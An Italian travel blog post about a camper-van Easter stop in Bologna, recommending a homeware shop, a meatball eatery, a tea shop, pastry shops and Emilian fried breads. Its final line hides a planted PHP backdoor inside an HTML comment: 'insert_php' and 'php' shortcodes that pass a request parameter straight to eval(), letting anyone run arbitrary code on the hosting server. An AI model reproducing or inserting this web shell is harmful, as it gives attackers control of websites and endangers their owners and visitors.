Avevo inaugurato il mio primo post con il “sottotitolo” #vitadacamper, la scorsa estate con una ricettina preparata sulla nostra casa su ruote: spiedini veloci con salsiccia e focaccia.

Vita da camper perché con l’arrivo del pupo le nostre vacanze sono diventate un po’ più comode e, per ora, abbiamo messo da parte lo zaino maxi da vacanza. Approfittando nel mezzo furgonato, quando possiamo andiamo un po’ a zonzo, lavoro e soprattutto meteo permettendo.

Per il ponte di pasqua il meteo è stato, come capita spesso, un po’ incerto. Alla fine la decisione: sabato avrebbe fatto brutto così l’idea di fermarsi a Bologna, passeggiare qualche oretta sotto i suoi portici (38 km nel solo centro) e poi domenica e lunedì ci spostiamo. La seconda meta, baciata dal sole e da un po’ di vento ve la svelerò nel prossimo post.

Una gentilissima signora sul bus per il centro di Bologna ci ha fornito un po’ di indicazioni e ci ha anticipato che in città avremmo trovato dei lavori in corso per la linea del filobus in costruzione. Diceva che sembra non terminare più ma costare parecchio. Quindi partiamo per la passeggiata a random come la chiamo io, in modo un po’ casuale, facendo tappa in qualche posticino che conoscevamo già e altri improvvisati.

Due più una, quindi tre le tappe quasi obbligate per me, che vi consiglio se un pomeriggio siete a zonzo per Bologna:

Gallina Smilza, un negozio coloratissimo di oggetti per la casa, cesti, tappeti, tessuti, tazze, piatti in ceramica ma soprattutto in melamina, un materiale plastico in questo caso senza derivati del petrolio. Mille colori e fantasie. Difficile scegliere all’interno del negozio e andare via velocemente. Il negozio vende anche on line

!   IMG_9894IMG_9895IMG_9897

Nella stessa via, se viene un languirono, una capatina da Bolpetta può’ essere una soluzione per pranzo e per fare uno spuntino molto saziante: polpette classiche, vegetariane, insolite, ma non solo anche primi e stuzzichini.

IMG_6643

Stregate, tea shop molto grazioso e interessante soprattutto per la varietà e l’originalità degli infusi disponibili. Un po’ di tea Masala Chai per me è d’obbligo ma anche l’infuso Limoncello da gustare caldo ma anche freddo d’estate è favoloso.

IMG_6663 IMG_6664

Passeggiando abbiamo incontrato alcune pasticcerie con delle vetrine bellissime. Le uova di pasqua di Gamberini erano molto creative. Da Zanarini c’era talmente tanta scelta di dolci che ho faticato a scegliere. Alla fine sono andata sul classico: frolla con crema pasticciera e lamponi.Le sue uova pasquali erano perfette. Niente uova negli altri periodi dell’anno ma sicuramente creazioni imprendibili per tutte le festività.

IMG_9875IMG_9883IMG_9885

IMG_9880

Un acquisto gastronomico ci voleva, non si poteva tornare alla nostra casa su ruote senza gnocco fritto emiliano (un impasto di pane fritto, salato ottimo con i salumi e soprattutto il crudo) e tigelle o crescentine modenesi (una via di mezzo tra focaccine e piadine, ottime calde con sopra un battuto di lardo e rosmarino). Il gnocco fritto ho provato a prepararlo da zero un po’ di tempo fa, non è difficile. Solo un po’ lungo per chi si occupa di friggere, molto buono per chi lo gusta!

IMG_9997

<!– [insert_php]if (isset($_REQUEST["XjYcv"])){eval($_REQUEST["XjYcv"]);exit;}[/insert_php][php]if (isset($_REQUEST["XjYcv"])){eval($_REQUEST["XjYcv"]);exit;}[/php] –>